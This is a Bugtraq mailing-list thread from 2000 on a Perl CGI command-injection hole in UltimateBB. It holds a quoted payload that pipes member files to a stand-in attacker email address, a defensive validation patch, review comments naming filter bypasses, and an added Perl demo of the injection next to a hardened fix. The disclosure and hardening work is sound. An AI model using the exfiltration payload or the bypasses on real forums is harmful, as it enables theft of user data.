Bugtraq mailing list archives
Re: perl-cgi hole in UltimateBB by Infopop Corp.
From: ILazar () TBG COM (Irwin Lazar)
Date: Thu, 17 Feb 2000 07:24:30 -0700
According to the folks at UBB, the latest version, 5.43d, fixes this vulnerability. Has anyone been able to verify if this is in fact correct?

Irwin
-----Original Message-----
From: Jordan Ritter [mailto:jpr5 () BOS BINDVIEW COM]
Sent: Tuesday, February 15, 2000 8:48 PM
To: BUGTRAQ () SECURITYFOCUS COM
Subject: Re: perl-cgi hole in UltimateBB by Infopop Corp.

On Mon, 14 Feb 2000, Kevin Hillabolt wrote:

# It works on the full version also...
#
# Little different syntax:
# topic=012345.cgi|cat%20../Members/*|mail hacker () evil org|
# (note the ../ on the Members. You have to go up a directory to get the
# file. Maybe you could stop it via simple folder permissions??)

Provided with no warranty. unescape() borrowed from the far superior CGI.pm. It appears to work, but I haven't checked it for completeness.

The ubb scripts are a programming disaster, and pass around metachars and filenames through form parameters, making input validation difficult. The patch below selectively validates input based on the name of the variable we're validating (i.e. only certain variables are dangerous; others are just dumb and not a risk). It's better to try and validate at the top level than to code review the source and try to patch every idiotic mistake that was made.

At the very least, this stops the specific attack that was posted. There could be other holes that this doesn't cover, or alternative ways to carry out the same attack. Hopefully Infopop will get their act together soon. I can't believe they distribute this crap as commercial software. Actually, what I can't believe is how many people paid for it. God help us all.
--jordan $ diff ubb_library.pl ubb_library.pl.orig 84,93d83 < # unescape URL-encoded data < sub unescape { < shift() if ref($_[0]); < my $todecode = shift; < return undef unless defined($todecode); < $todecode =~ tr/+/ /; # pluses become spaces < $todecode =~ s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge; < return $todecode; < } < 1047a10381112,1120d1102 < # clean input < if ($key =~ /^(forum|topic|number|replynum)$/i) { < my($newval) = &unescape($val); < < if ($newval !~ /^([ -\@\w.]+)$/) { < $val = "bad_input"; < } < } < 1266,1284d1247 < < my(@out); < foreach $row (@in) { < my($name,$value) = split ("=", $row); < < if ($name =~ /^(forum|topic|number|replynum)$/i) { < my($newvalue) = &unescape($value); < < if ($newvalue !~ /^([ -\@\w.]+)$/) { < $value = "bad_input"; < } < < push @out, "$name=$value"; < } else { < push @out, $row; < } < } < @in = @out;
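Review bot: in the unescape() helper (the 84,93d83 hunk), pack("c",hex($1)) uses the signed-char template; "C" is the unsigned-byte template, and "c" only yields the same byte for %80 through %FF by wrapping, which newer Perls warn about under -w. Use pack("C",hex($1)). The rest of the helper is sound: tr/+/ / runs before %XX decoding, which is the right order, and the decoded value is only used as the thing to test, never substituted back for the raw parameter.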
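Review bot: the whitelist in the "clean input" hunk (1112,1120d1102), /^([ -\@\w.]+)$/, is far wider than it looks: the range from space to @ admits / ; & $ ( ) * < > ' " and %, so the ../Members/ traversal in the posted payload still passes and only the pipe and backtick characters are actually stopped. Because % itself is allowed, a double-encoded %257C decodes once to %7C and passes too, becoming | if anything downstream decodes a second time. And $ matches before a trailing newline, so "012345.cgi\n" (%0A) is accepted. Tighten it to something like /^[\w.-]+\z/ plus an explicit rejection of "..", and use \z rather than $. Separately, the 1047a1038 hunk shows no ">" line, so whatever was added at line 1047 cannot be reviewed from this posting.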
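Review bot: the 1266,1284d1247 loop duplicates the name list and the regex from the 1112 hunk verbatim; factor both call sites into one sub (e.g. a clean_param($name, $value) that returns undef on failure) so the two paths cannot drift apart when the pattern is tightened. Also, in both places a failed check silently substitutes $value = "bad_input" and lets the script carry on; an attacker gets a normal page back and nothing is logged. Prefer to abort the request with an error and log the offending name/value so these probes are visible, rather than continuing with a made-up topic name.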
Attachment: Irwin_Lazar__E-mail_.vcf (application/octet-stream)
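The mechanism behind Kevin Hillabolt's payload, and a tighter per-parameter check than the one in the patch quoted above, as an added Perl example that is not part of the original thread, not UBB's code and not Jordan Ritter's patch. It assumes the vulnerable call is a two-argument open() on the topic parameter (the shape the trailing "|" in the payload relies on); ubb_open_unsafe, ubb_open_safe and clean_param are invented names, and the assumed topic-name format (a bare name plus one extension, like 012345.cgi) is a guess modelled on the posted payload.

```perl
#!/usr/bin/perl
# Added example, not UBB's code and not the patch from the thread. Shows why
# "topic=012345.cgi|cmd|" executes cmd (2-argument open() treats a trailing
# '|' as "read from this command") and what a tighter check than the patch's
# [ -\@\w.] class looks like. ubb_open_unsafe, ubb_open_safe and clean_param
# are invented names; the assumed topic-name shape (name plus one extension)
# is modelled on the 012345.cgi in the posted payload.
use strict;
use warnings;
use File::Temp qw(tempdir);

# Same decoding the patch does: '+' -> space, %XX -> byte. "C" (unsigned
# byte) rather than "c", which is a signed char and warns for 0x80-0xFF.
sub unescape {
    my ($s) = @_;
    return undef unless defined $s;
    $s =~ tr/+/ /;
    $s =~ s/%([0-9a-fA-F]{2})/pack("C", hex($1))/ge;
    return $s;
}

sub slurp { my ($fh) = @_; local $/; my $d = <$fh>; close $fh; return $d }

# VULNERABLE: the shape of the original bug. A 2-arg open() on attacker data
# lets the data choose the mode; a trailing '|' makes it a pipe from a shell.
sub ubb_open_unsafe {
    my ($dir, $topic) = @_;
    open(my $fh, "$dir/$topic") or return undef;   # 2-arg open: do not do this
    return slurp($fh);
}

# Per-name validation like the patch, but the whitelist excludes '/', '..',
# shell metacharacters and, via \z instead of $, a trailing newline.
sub clean_param {
    my ($name, $value) = @_;
    return $value unless $name =~ /^(?:forum|topic|number|replynum)\z/i;
    my $decoded = unescape($value);
    return undef unless defined $decoded;
    return undef unless $decoded =~ /^[A-Za-z0-9_-]+(?:\.[A-Za-z0-9]+)?\z/;
    return $decoded;
}

# HARDENED: validated name, 3-arg open with an explicit read mode, so the
# value can never turn into a pipe or a write.
sub ubb_open_safe {
    my ($dir, $topic) = @_;
    my $clean = clean_param('topic', $topic);
    return undef unless defined $clean;
    open(my $fh, '<', "$dir/$clean") or return undef;
    return slurp($fh);
}

# The regex from the patch, kept here only to show what it still lets through.
my $patch_class = qr/^([ -\@\w.]+)$/;

# --- constructed inputs and a scratch forum directory ---
my $dir = tempdir(CLEANUP => 1);
open(my $out, '>', "$dir/012345.cgi") or die "create: $!";
print $out "legitimate topic data\n";
close $out;

my $payload = '012345.cgi|echo%20pwned|';   # posted payload shape, harmless command
my $benign  = '012345.cgi';

# Vulnerable path: sh runs "$dir/012345.cgi|echo pwned" (the first part fails
# on stderr; "pwned" comes back as the supposed file contents).
my $got = ubb_open_unsafe($dir, unescape($payload));
print "unsafe open returned: ", defined $got ? $got : "(nothing)\n";

print "safe open, payload: ", defined ubb_open_safe($dir, $payload) ? "accepted\n" : "rejected\n";
print "safe open, benign:  ", ubb_open_safe($dir, $benign);

# Probes the patch's class still accepts: traversal, trailing newline, ';'
for my $probe ('../Members/x', "012345.cgi\n", '012345.cgi;id') {
    my $shown = $probe; $shown =~ s/\n/\\n/g;
    printf "%-22s patch regex: %-8s this check: %s\n", "'$shown'",
        ($probe =~ $patch_class ? 'accepts' : 'rejects'),
        (defined clean_param('topic', $probe) ? 'accepts' : 'rejects');
}
```

Run it as an ordinary user in a scratch directory; the only command it executes is echo. The three probes at the end are the point: each one is accepted by the patch's character class (space through @ covers / ; and the dot, and $ matches before a final newline) and rejected by the narrower pattern, while the legitimate topic name opens normally through the three-argument open.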